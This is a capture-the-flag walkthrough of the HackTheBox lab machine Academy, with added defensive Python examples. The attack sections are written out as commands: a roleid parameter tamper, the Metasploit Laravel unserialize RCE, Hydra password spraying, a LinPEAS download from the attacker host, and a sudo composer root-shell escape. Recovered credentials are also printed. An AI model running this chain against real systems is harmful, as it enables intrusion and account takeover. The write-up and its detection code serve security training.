Today we are going to crack a machine called Academy. It was created by egre55 & mrb3n. This is a Capture the Flag type of challenge. This machine is hosted on HackTheBox. Let’s get cracking!
Penetration Testing Methodology
· Network Scanning
  o Nmap Scan
· Enumeration
  o Enumerating Virtual Hosts
  o Browsing HTTP Service in Browser
  o Registering into Application
  o Exploiting Parameter Tampering for Administrator Access
  o Directory Bruteforce using dirb
  o Enumerating Admin Pages
  o Enumerating Virtual Host
  o Enumerating Laravel PHP Framework
  o Extracting APP_KEY
  o Searching for Exploit on Searchsploit
· Exploitation
  o Exploiting Unserialize RCE using Metasploit
  o Enumerating DB Password
  o Reading /etc/passwd File
  o Password Spraying using Hydra
  o Logging in as cry0l1t3
  o Reading User Flag
· Privilege Escalation
  o Uploading and Executing LinPEAS
  o Enumerating Logs for Credentials of mrb3n User
  o Logging in as mrb3n User
  o Enumerating Sudo Permissions
  o Exploiting Sudo Permissions on composer
  o Getting Root Shell
  o Reading the Root Flag
Walkthrough
Network Scanning
To attack any machine, we need its IP address. Machines hosted on HackTheBox have a static IP address.
IP Address assigned: 10.129.106.234
Now that we have the IP address, we need to enumerate the open ports on the machine. For this, we run an nmap scan against all ports with default scripts and version detection.
nmap -p- -sC -sV 10.129.106.234
Enumeration
From the nmap scan, we can see that port 80 redirects to http://academy.htb/, so let's add this hostname to our /etc/hosts file.
nano /etc/hosts
10.129.106.234 academy.htb
Since we have added the host, we can now view the website in the browser. It is a clone of the HTB Academy website.
http://academy.htb
Among the broken links there was a register.php page. We tried to register on the application. It is always good practice to use Burp to inspect the requests being sent to the server in order to understand how the application works.
http://academy.htb/register.php
We found that, apart from the username and password, a roleid parameter is sent to the server as well. It has the value 0 by default.
We tried changing the value to 1 to see if we get some additional access on the application. The basic application remains the same, as shown below.
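The registration flaw above, as an added example that is not part of the original writeup: a minimal handler in its vulnerable and hardened form. The field names follow the request seen above; the User type and the role values (0 = user, 1 = administrator) are assumptions for illustration.

```python
# Added example (not from the original writeup): a minimal registration handler in
# the vulnerable and hardened form. Field names follow the request seen above;
# the User type and the role values are assumed for illustration.
from dataclasses import dataclass

ROLE_USER, ROLE_ADMIN = 0, 1          # assumed: 0 = normal user, 1 = administrator


@dataclass
class User:
    username: str
    roleid: int


def register_vulnerable(form: dict) -> User:
    """Copies every posted field into the account, so a client that adds
    roleid=1 to the POST body registers itself as an administrator."""
    return User(form["username"], int(form.get("roleid", ROLE_USER)))


def register_hardened(form: dict) -> User:
    """Reads only the fields registration needs; the role is set server-side
    and unexpected fields are reported rather than silently honoured."""
    expected = {"username", "password"}
    extra = sorted(set(form) - expected)
    if extra:
        print(f"[warn] registration ignored unexpected fields: {extra}")
    return User(form["username"], ROLE_USER)


def promote(actor: User, target: User) -> User:
    """The only path that changes a role: an existing admin must perform it."""
    if actor.roleid != ROLE_ADMIN:
        raise PermissionError("only administrators may change roles")
    return User(target.username, ROLE_ADMIN)


def is_admin(user: User) -> bool:
    return user.roleid == ROLE_ADMIN


# Constructed request body: the normal fields plus a tampered roleid.
TAMPERED_FORM = {"username": "newuser", "password": "hunter2", "roleid": "1"}

if __name__ == "__main__":
    print("vulnerable ->", register_vulnerable(TAMPERED_FORM))
    print("hardened   ->", register_hardened(TAMPERED_FORM))
```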
We performed a directory brute force in order to detect any high-privilege or otherwise sensitive pages. This led us to the admin.php page.
dirb http://academy.htb
http://academy.htb/admin.php
We opened the detected page and found a hostname, "dev-staging-01.academy.htb".
http://academy.htb/admin-page.php
We add this hostname to our /etc/hosts file against the same IP address, as before.
nano /etc/hosts
10.129.106.234 academy.htb dev-staging-01.academy.htb
Now we browse to dev-staging-01.academy.htb and find that it returns an Internal Server Error. Some paths visible in the error suggest that Laravel is working behind the scenes. We also look through the debug output in the browser to find the environment variables. It states that APP_NAME is indeed Laravel, and there is a base64-encoded key here. It also contains a ton of other information.
http://dev-staging-01.academy.htb
Laravel
APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
Since we know the Laravel framework is at work, we search for it in Searchsploit. We found an Unserialize Command Execution exploit.
searchsploit Laravel
Exploitation
As it is present inside Metasploit, we use it from there. It requires the IP address of the target machine, the IP address of the attacker machine, the base64 APP_KEY we found earlier, and the virtual host that is running Laravel. After providing all the data, we run the exploit.
use exploit/unix/http/laravel_token_unserialize_exec
set rhosts 10.129.106.234
set lhost 10.10.14.80
set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
set vhost dev-staging-01.academy.htb
exploit
python3 -c 'import pty;pty.spawn("bash")'
Through the RCE, we get a shell. We upgraded it to a TTY shell using a Python one-liner. The shell we got is for the user www-data. We started enumerating the machine in order to find a way to elevate privileges. This led us to the academy directory in the /var/www/html folder. Here we found a hidden .env file. We read the .env file to find the MySQL DB credentials.
cd /var/www/html/
cd academy
cat .env
DB_PASSWORD=mySup3rP4s5w0rd!!
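Both findings on the staging host, the debug page dumping APP_KEY and the readable .env holding the DB password, come down to the contents and permissions of one file. As an added example that is not part of the original writeup, the audit below parses a Laravel .env and reports those conditions. The sample .env is constructed around the APP_KEY and DB_PASSWORD quoted above; the other values, the finding codes and the file mode are assumptions.

```python
# Added example (not part of the original writeup): audit a Laravel .env for the
# weaknesses this box exposed. The sample .env is constructed around the APP_KEY
# and DB_PASSWORD quoted above; the other values and the file mode are assumed.
import base64
import stat
from typing import Optional

SAMPLE_ENV = """\
APP_NAME=Laravel
APP_ENV=local
APP_DEBUG=true
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
DB_CONNECTION=mysql
DB_USERNAME=dev
DB_PASSWORD="mySup3rP4s5w0rd!!"
"""


def parse_env(text: str) -> dict:
    """Minimal KEY=value parser: skips blanks and comments, strips quotes."""
    env = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        env[key.strip()] = value.strip().strip('"').strip("'")
    return env


def key_bytes(app_key: str) -> Optional[bytes]:
    """Laravel stores APP_KEY as base64:<key>; the raw key must be 16 or 32 bytes
    (AES-128-CBC / AES-256-CBC). Returns None when the value is not usable."""
    raw = app_key[7:] if app_key.startswith("base64:") else app_key
    try:
        key = base64.b64decode(raw, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    return key if len(key) in (16, 32) else None


def audit_env(text: str, mode: Optional[int] = None) -> list:
    """Returns finding codes for the .env contents (and its file mode, if given)."""
    env, findings = parse_env(text), []
    if env.get("APP_DEBUG", "false").lower() == "true":
        findings.append("debug-enabled")       # error pages dump env, APP_KEY included
    if env.get("APP_ENV", "production") != "production":
        findings.append("non-production-env")  # staging settings on a reachable host
    if key_bytes(env.get("APP_KEY", "")) is None:
        findings.append("bad-app-key")
    if env.get("DB_PASSWORD") and mode is not None and mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append("env-readable")        # DB secret readable beyond the owner
    return findings
```

Run it against a real deployment with `audit_env(open(path).read(), os.stat(path).st_mode)`; an empty list is the state a production .env should be in.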
We read the /etc/passwd file to collect the usernames for SSH login.
cat /etc/passwd
We took the usernames found and created a wordlist named user.txt, and we put the DB password we found into a text file named pass.txt. Now we perform password spraying against all the users to see if any user has the same password for SSH login. We do this using the hydra tool. Hydra told us that the user cry0l1t3 has the password we were looking for.
hydra -L user.txt -P pass.txt 10.129.106.234 ssh
cry0l1t3
mySup3rP4s5w0rd!!
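The spray above is loud from the server's side: one source fails against many different accounts within seconds and then succeeds. As an added example that is not part of the original writeup, the detection below parses sshd lines from auth.log and flags that pattern. The log lines are constructed (the usernames other than those on this box are invented); the year, window and threshold are assumptions.

```python
# Added example (not part of the original writeup): detect the SSH password
# spray above from the defender's side. The auth.log lines are constructed;
# the year, window and threshold are assumed.
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+")

SAMPLE_LOG = """\
Nov  2 10:15:01 academy sshd[2001]: Failed password for invalid user www-data from 10.10.14.80 port 40001 ssh2
Nov  2 10:15:01 academy sshd[2002]: Failed password for alice from 10.10.14.80 port 40002 ssh2
Nov  2 10:15:02 academy sshd[2003]: Failed password for bob from 10.10.14.80 port 40003 ssh2
Nov  2 10:15:02 academy sshd[2004]: Failed password for mrb3n from 10.10.14.80 port 40004 ssh2
Nov  2 10:15:03 academy sshd[2005]: Accepted password for cry0l1t3 from 10.10.14.80 port 40005 ssh2
Nov  2 10:20:00 academy sshd[2100]: Failed password for alice from 10.10.14.9 port 50001 ssh2
"""


def parse_auth_log(text: str, year: int = 2020) -> list:
    """Returns (timestamp, result, user, source_ip) tuples for password events."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            stamp = " ".join(m["ts"].split())      # syslog pads single-digit days
            ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def detect_spray(events: list, window_s: int = 60, min_users: int = 3) -> list:
    """Flags a source that fails against >= min_users distinct accounts within
    window_s seconds (one password, many users) and any login it then gets."""
    by_ip = defaultdict(list)
    for ev in sorted(events):
        by_ip[ev[3]].append(ev)
    alerts = []
    for ip, evs in by_ip.items():
        failed = [e for e in evs if e[1] == "Failed"]
        for i, (start, _, _, _) in enumerate(failed):
            users = {e[2] for e in failed[i:] if (e[0] - start).total_seconds() <= window_s}
            if len(users) >= min_users:
                alerts.append(("spray", ip, len(users)))
                alerts += [("spray-success", ip, e[2]) for e in evs if e[1] == "Accepted"]
                break
    return alerts
```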
We logged in through SSH as the user cry0l1t3. Again, we converted the shell into a TTY shell and then looked for the user flag.
ssh cry0l1t3@10.129.106.234
mySup3rP4s5w0rd!!
python3 -c 'import pty;pty.spawn("bash")'
cd /home/cry0l1t3
cat user.txt
Privilege Escalation
Now, in order to elevate privileges on the target machine, we use the LinPEAS post-exploitation script to enumerate the machine. We already have the script on our local machine; we hosted it on port 8000 and then downloaded it into the /tmp directory on the target using wget. Now we give it execute permission and run LinPEAS.
wget 10.10.14.80:8000/linpeas.sh
chmod 777 linpeas.sh
./linpeas.sh
LinPEAS extracted the credentials for the mrb3n user from the audit logs.
sh "su mrb3n",<nl>
su "mrb3n_Ac@d3my!",<nl>
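What LinPEAS surfaced above is keystroke logging from the audit TTY records: the line typed into the shell is harmless, but the line typed while su was waiting at its password prompt is the password itself. As an added example that is not part of the original writeup, the script below reads raw type=TTY records, decodes the hex-encoded keystrokes and reports, with the input masked, every capture made under a program that normally prompts for a password. The records are constructed in auditd's format; the uids, pids and the list of prompting programs are assumptions.

```python
# Added example (not part of the original writeup): find keystrokes that the audit
# TTY log captured while a password prompt was active, the weakness LinPEAS used
# above. The records are constructed in the raw auditd format; uids are assumed.
import re

TTY_RE = re.compile(r'type=TTY .*? uid=(?P<uid>\d+) .*?comm="(?P<comm>[^"]+)" data=(?P<hex>[0-9A-Fa-f]+)')
# Programs whose TTY input is, in normal use, a password rather than a command line.
PROMPTING = {"su", "sudo", "ssh", "passwd", "mysql"}


def tty_record(comm: str, typed: str, serial: int, uid: int = 1002) -> str:
    """Builds one constructed type=TTY line; auditd stores keystrokes hex-encoded."""
    return (f"type=TTY msg=audit(1604310400.{serial:03d}:{serial}): tty pid={1300 + serial} "
            f"uid={uid} auid={uid} ses=4 major=136 minor=2 comm=\"{comm}\" "
            f"data={typed.encode().hex().upper()}")


SAMPLE_AUDIT = "\n".join([
    tty_record("sh", "su mrb3n\r", 1),            # command line: not secret
    tty_record("su", "mrb3n_Ac@d3my!\r", 2),      # typed at su's password prompt
    tty_record("sh", "sudo -l\r", 3),
    tty_record("sudo", "mrb3n_Ac@d3my!\r", 4),    # typed at sudo's password prompt
])


def decode_tty(hexdata: str) -> str:
    """Recovers the typed text; Enter arrives as a carriage return (shown as <nl> by aureport)."""
    return bytes.fromhex(hexdata).decode("utf-8", errors="replace")


def find_exposures(text: str) -> list:
    """Returns (uid, comm, masked_input) for keystrokes captured under a prompting
    program. Only the length is reported so the report itself does not leak it."""
    hits = []
    for line in text.splitlines():
        m = TTY_RE.search(line)
        if not m or m["comm"] not in PROMPTING:
            continue
        for typed in decode_tty(m["hex"]).replace("\r", "\n").split("\n"):
            if typed:
                hits.append((int(m["uid"]), m["comm"], "*" * len(typed)))
    return hits


if __name__ == "__main__":
    for uid, comm, masked in find_exposures(SAMPLE_AUDIT):
        print(f"uid={uid} typed {masked} into {comm}: rotate this credential")
```

pam_tty_audit only records input at echo-off prompts when its log_passwd option is set, so removing that option from the PAM configuration stops new captures; the existing audit log still has to be purged and the exposed passwords rotated.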
We use these credentials to log in as the mrb3n user. Then we convert the shell into a TTY shell and enumerate the sudo permissions. We found that we can execute composer with elevated privileges. We are in luck, as composer is one of the binaries listed on GTFOBins. From there we got the method to get a root shell. Following that method, we get root on the target machine. We read the root flag to conclude the machine.
mrb3n
mrb3n_Ac@d3my!
python3 -c 'import pty;pty.spawn("bash")'
sudo -l
TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x
id
cd /root
cat root.txt